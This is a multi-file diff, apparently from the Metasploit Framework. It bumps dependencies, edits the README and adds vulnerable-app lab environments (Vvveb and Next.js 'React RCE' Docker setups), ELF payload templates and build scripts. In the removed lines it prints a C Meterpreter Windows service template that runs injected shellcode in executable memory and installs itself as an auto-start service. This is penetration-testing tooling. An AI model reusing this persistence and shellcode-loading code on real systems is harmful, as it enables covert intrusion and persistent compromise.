 net-ssh, 7.3.0, MIT
+netrc, 0.11.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.8, MIT
+nokogiri, 1.18.10, MIT
 nori, 2.7.1, MIT
-octokit, 4.25.1, MIT
+octokit, 10.0.0, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
-parser, 3.3.8.0, MIT
+parser, 3.3.9.0, MIT
 parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
-pp, 0.6.2, "ruby, Simplified BSD"
+pp, 0.6.3, "ruby, Simplified BSD"
 prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.4.0, MIT
-pry, 0.14.2, MIT
-pry-byebug, 3.10.1, MIT
+prism, 1.5.1, MIT
+pry, 0.15.2, MIT
+pry-byebug, 3.11.0, MIT
 psych, 5.2.6, MIT
-public_suffix, 6.0.1, MIT
+public_suffix, 6.0.2, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.17, MIT
+rack, 2.2.19, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
 rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.1.5.1, MIT
+railties, 7.2.2.2, MIT
 rainbow, 3.1.1, MIT
 rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.14.2, ruby
-recog, 3.1.17, unknown
+rdoc, 6.15.0, ruby
+recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
-regexp_parser, 2.10.0, MIT
-reline, 0.6.1, ruby
+regexp_parser, 2.11.3, MIT
+reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
+rest-client, 2.1.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
-rex-core, 0.1.34, "New BSD"
+rex-core, 0.1.35, "New BSD"
 rex-encoder, 0.1.8, "New BSD"
-rex-exploitation, 0.1.41, "New BSD"
+rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.16, "New BSD"
+rex-powershell, 0.1.103, "New BSD"
+rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.63, "New BSD"
+rex-socket, 0.1.64, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
 rex-text, 0.2.61, "New BSD"
@@ -184,18 +187,18 @@ rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.0, MIT
-rspec-core, 3.13.3, MIT
-rspec-expectations, 3.13.3, MIT
-rspec-mocks, 3.13.2, MIT
-rspec-rails, 7.1.1, MIT
+rspec, 3.13.1, MIT
+rspec-core, 3.13.5, MIT
+rspec-expectations, 3.13.5, MIT
+rspec-mocks, 3.13.5, MIT
+rspec-rails, 8.0.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.2, MIT
+rspec-support, 3.13.6, MIT
 rubocop, 1.75.7, MIT
-rubocop-ast, 1.44.1, MIT
+rubocop-ast, 1.47.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
-ruby-prof, 1.7.1, "Simplified BSD"
+ruby-prof, 1.7.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
@@ -216,17 +219,19 @@ swagger-blocks, 3.0.0, MIT
 syslog, 0.3.0, "ruby, Simplified BSD"
 test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.2, MIT
+thor, 1.4.0, MIT
 tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
 toml, 0.2.0, MIT
+tsort, 0.2.0, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.1.4, MIT
-unicode-emoji, 4.0.4, MIT
+unicode-display_width, 3.2.0, MIT
+unicode-emoji, 4.1.0, MIT
 unix-crypt, 1.3.1, 0BSD
+useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
 webrick, 1.9.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.7, "Apache 2.0"
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
+For questions and suggestions, you can:
+
+- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
+- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
+- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
+- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+
+**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.

 ## Installing Metasploit

@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

+require 'action_view'
+# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
+# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
+raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
+module ActionView::Helpers::TagHelper
+  class TagBuilder
+    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
+      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
+        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
+        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
+        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
+              def #{method_name}(content = nil, escape: true, **options, &block)
+                tag_string("#{name}", content, options, escape: escape, &block)
+              end
+            RUBY
+      end
+    end
+  end
+end
+
 all_environments = [
    :development,
    :production,
@@ -41,7 +61,7 @@ module Metasploit
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
      config.autoloader = :zeitwerk

-      config.load_defaults 7.1
+      config.load_defaults 7.2

      config.eager_load = false
    end
@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,25 @@
+FROM php:8.3-fpm
+
+RUN apt-get clean && apt-get update && \
+    apt-get install -y \
+        wget unzip \
+        libicu-dev \
+        libfreetype6-dev \
+        libjpeg62-turbo-dev \
+        libxml2-dev \
+        libwebp-dev \
+        libpng-dev \
+        libzip-dev \
+        libonig-dev \
+        libcurl4-openssl-dev && \
+    docker-php-ext-configure gd --with-webp --with-jpeg && \
+    docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
+    pecl install apcu && docker-php-ext-enable apcu && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /var/www/html
+
+RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
+    unzip latest.zip && rm latest.zip
+
+COPY php.ini /usr/local/etc/php/php.ini
@@ -0,0 +1,43 @@
+services:
+  php:
+    build: .
+    container_name: vvveb-php
+    volumes:
+      - vvveb_html:/var/www/html
+    networks:
+      - vvveb-net
+
+  nginx:
+    image: nginx:stable
+    container_name: vvveb-nginx
+    ports:
+      - "8080:80"
+    volumes:
+      - ./nginx.conf:/etc/nginx/conf.d/default.conf
+      - vvveb_html:/var/www/html:ro
+    depends_on:
+      - php
+    networks:
+      - vvveb-net
+
+  mysql:
+    image: mysql:5.7
+    container_name: vvveb-mysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: vvveb
+      MYSQL_USER: vvveb
+      MYSQL_PASSWORD: vvveb
+    volumes:
+      - db_data:/var/lib/mysql
+    networks:
+      - vvveb-net
+
+networks:
+  vvveb-net:
+    driver: bridge
+
+volumes:
+  db_data:
+  vvveb_html:
@@ -0,0 +1,21 @@
+server {
+    listen 80;
+    server_name localhost;
+
+    root /var/www/html;
+    index index.php index.html;
+
+    location / {
+        try_files $uri $uri/ /index.php?$args;
+    }
+
+    location ~ \.php$ {
+        try_files $uri =404;
+        fastcgi_split_path_info ^(.+\.php)(/.+)$;
+        fastcgi_pass php:9000;
+        fastcgi_index index.php;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+        fastcgi_param PATH_INFO $fastcgi_path_info;
+    }
+}
@@ -0,0 +1,5 @@
+display_errors = On
+memory_limit = 512M
+upload_max_filesize = 64M
+post_max_size = 64M
+max_execution_time = 300
@@ -1,304 +0,0 @@
-#include <String.h>
-#include <Windows.h>
-#include <stdlib.h>
-#include <stdio.h>
-
-#define SERVICE_NAME     <%= @service_name.inspect %>
-#define DISPLAY_NAME     <%= @service_description.inspect %>
-#define RETRY_TIME       <%= @retry_time %>
-
-//
-// Globals
-//
-
-SERVICE_STATUS status;
-SERVICE_STATUS_HANDLE hStatus;
-
-//
-// Meterpreter connect back to host
-//
-
-void start_meterpreter()
-{
-// Your meterpreter shell here
-  <%= buf %>
-
-  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  memcpy(buffer,buf,sizeof(buf));
-  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
-  WaitForSingleObject(hThread, -1); //INFINITE
-  CloseHandle(hThread);
-}
-
-//
-// Call self without parameter to start meterpreter
-//
-
-void self_call()
-{
-    char path[MAX_PATH];
-    char cmd[MAX_PATH];
-
-    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
-        // Get module file name failed
-        return;
-    }
-
-    STARTUPINFO startup_info;
-    PROCESS_INFORMATION process_information;
-
-    ZeroMemory(&startup_info, sizeof(startup_info));
-    startup_info.cb = sizeof(startup_info);
-
-    ZeroMemory(&process_information, sizeof(process_information));
-
-    // If create process failed.
-    // CREATE_NO_WINDOW = 0x08000000
-    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
-                      NULL, &startup_info, &process_information) == 0)
-    {
-        return;
-    }
-
-    // Wait until the process died.
-    WaitForSingleObject(process_information.hProcess, -1);
-}
-
-//
-// Process control requests from the Service Control Manager
-//
-
-VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
-{
-    switch (fdwControl) {
-        case SERVICE_CONTROL_STOP:
-        case SERVICE_CONTROL_SHUTDOWN:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_STOPPED;
-            break;
-
-        case SERVICE_CONTROL_PAUSE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_PAUSED;
-            break;
-
-        case SERVICE_CONTROL_CONTINUE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_RUNNING;
-            break;
-
-        default:
-            break;
-    }
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    return;
-}
-
-
-//
-// Main function of service
-//
-
-VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
-{
-    // Register the service handler
-
-    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
-
-    if (hStatus == 0) {
-        //printf("Cannot register service handler (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    // Initialize the service status structure
-
-    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
-    status.dwCurrentState = SERVICE_RUNNING;
-    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-    status.dwWin32ExitCode = 0;
-    status.dwServiceSpecificExitCode = 0;
-    status.dwCheckPoint = 0;
-    status.dwWaitHint = 0;
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        return;
-    }
-
-    // Start the Meterpreter
-    while (status.dwCurrentState == SERVICE_RUNNING) {
-        self_call();
-        Sleep(RETRY_TIME);
-    }
-
-    return;
-}
-
-
-//
-// Installs and starts the Meterpreter service
-//
-
-BOOL install_service()
-{
-    SC_HANDLE hSCManager;
-    SC_HANDLE hService;
-
-    char path[MAX_PATH];
-
-    // Get the current module name
-
-    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
-        //printf("Cannot get module name (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Build the service command line
-
-
-    char cmd[MAX_PATH];
-
-    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
-    if (total_len < 0 || total_len >= sizeof(cmd)){
-        //printf("Cannot build service command line (0x%08x)", -1);
-        return FALSE;
-    }
-
-    cmd[0] = '\0';
-    strcat(cmd, "\"");
-    strcat(cmd, path);
-    strcat(cmd, "\" <%= @start_cmd %>");
-
-    // Open the service manager
-
-    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
-
-    if (hSCManager == NULL) {
-        //printf("Cannot open service manager (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Create the service
-
-    hService = CreateService(
-        hSCManager,
-        SERVICE_NAME,
-        DISPLAY_NAME,
-        0xf01ff,            // SERVICE_ALL_ACCESS
-        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
-        SERVICE_AUTO_START,
-        SERVICE_ERROR_NORMAL,
-        cmd,
-        NULL,
-        NULL,
-        NULL,
-        NULL,   /* LocalSystem account */
-        NULL
-    );
-
-    if (hService == NULL) {
-        //printf("Cannot create service (0x%08x)", GetLastError());
-
-        CloseServiceHandle(hSCManager);
-        return FALSE;
-    }
-
-    // Start the service
-
-    char* args[] = { path, "service" };
-
-    if (StartService(hService, 2, (const char**)&args) == 0) {
-        DWORD err = GetLastError();
-
-        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
-        {
-            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
-
-            CloseServiceHandle(hService);
-            CloseServiceHandle(hSCManager);
-            return FALSE;
-        }
-    }
-
-    // Cleanup
-
-    CloseServiceHandle(hService);
-    CloseServiceHandle(hSCManager);
-
-    //printf("Service %s successfully installed.", SERVICE_NAME);
-
-    return TRUE;
-}
-
-//
-// Start the service
-//
-
-void start_service()
-{
-    SERVICE_TABLE_ENTRY ServiceTable[] =
-    {
-        { SERVICE_NAME, &ServiceMain },
-        { NULL, NULL }
-    };
-
-    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
-        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
-        exit(1);
-    }
-}
-
-
-//
-// Main function
-//
-
-int main()
-{
-    // Parse the command line argument.
-    // For now, int main(int argc, char *argv) is buggy with metasm.
-    // So we choose this approach to achieve it.
-    LPTSTR cmdline;
-    cmdline = GetCommandLine();
-
-    char *argv[MAX_PATH];
-    char * ch = strtok(cmdline," ");
-    int argc = 0;
-
-    while (ch != NULL)
-    {
-       argv[argc] = malloc( strlen(ch)+1) ;
-       strncpy(argv[argc], ch, strlen(ch)+1);
-
-       ch = strtok (NULL, " ");
-       argc++;
-    }
-
-    if (argc > 1) {
-
-        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
-
-            // Installs and starts the service
-
-            install_service();
-            return 0;
-        }
-        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
-            // Starts the Meterpreter as a service
-
-            start_service();
-            return 0;
-        }
-    }
-
-    // Starts the Meterpreter as a normal application
-
-    start_meterpreter();
-
-    return 0;
-}
@@ -0,0 +1,14 @@
+FROM node:18-alpine
+
+WORKDIR /app
+
+COPY package.json ./
+RUN npm install
+
+COPY . .
+
+RUN npm run build
+
+EXPOSE 3000
+
+CMD ["npm", "start"]
@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>React RCE</title>
+  </head>
+  <body>
+    <div id="root"></div>
+    <script type="module" src="/src/main.jsx"></script>
+  </body>
+</html>
@@ -0,0 +1,6 @@
+/** @type {import('next').NextConfig} */
+const nextConfig = {
+  output: 'standalone',
+}
+
+module.exports = nextConfig
@@ -0,0 +1,22 @@
+{
+  "name": "my-next-app",
+  "version": "0.1.0",
+  "private": true,
+  "scripts": {
+    "dev": "next dev",
+    "build": "next build",
+    "start": "next start",
+    "lint": "next lint"
+  },
+  "dependencies": {
+    "react": "19.0.0",
+    "react-dom": "19.0.0",
+    "next": "15.0.4"
+  },
+  "devDependencies": {
+    "typescript": "^5",
+    "@types/node": "^20",
+    "@types/react": "^18",
+    "@types/react-dom": "^18"
+  }
+}
@@ -0,0 +1,5 @@
+"use server";
+
+export async function greet(name: string) {
+  return `Hello, ${name}!`;
+}
@@ -0,0 +1,11 @@
+export default function RootLayout({
+  children,
+}: {
+  children: React.ReactNode
+}) {
+  return (
+    <html lang="ru">
+      <body>{children}</body>
+    </html>
+  );
+}
@@ -0,0 +1,11 @@
+import { greet } from './actions';
+
+export default async function Home() {
+  const greeting = await greet("World");
+  
+  return (
+    <main style={{ padding: '2rem', fontFamily: 'system-ui' }}>
+      <h1>{greeting}</h1>
+    </main>
+  );
+}
@@ -0,0 +1,26 @@
+{
+  "compilerOptions": {
+    "lib": ["dom", "dom.iterable", "esnext"],
+    "allowJs": true,
+    "skipLibCheck": true,
+    "strict": true,
+    "noEmit": true,
+    "esModuleInterop": true,
+    "module": "esnext",
+    "moduleResolution": "bundler",
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "jsx": "preserve",
+    "incremental": true,
+    "plugins": [
+      {
+        "name": "next"
+      }
+    ],
+    "paths": {
+      "@/*": ["./src/*"]
+    }
+  },
+  "include": ["next-env.d.ts", "**/*.ts", "**/*.tsx", ".next/types/**/*.ts"],
+  "exclude": ["node_modules"]
+}
@@ -0,0 +1,6 @@
+import { defineConfig } from "vite";
+import react from "@vitejs/plugin-react";
+
+export default defineConfig({
+  plugins: [react()],
+});
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_loongarch64_template.s -f bin -o template_loongarch64_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0x102                    ;   e_machine    = LOONGARCH
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+  db 0
+  db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_loongarch64_template.s -f bin -o template_loongarch64_linux.bin
+
+BITS 64
+
+org     0x80400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x102                    ;   e_machine    = LOONGARCH
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
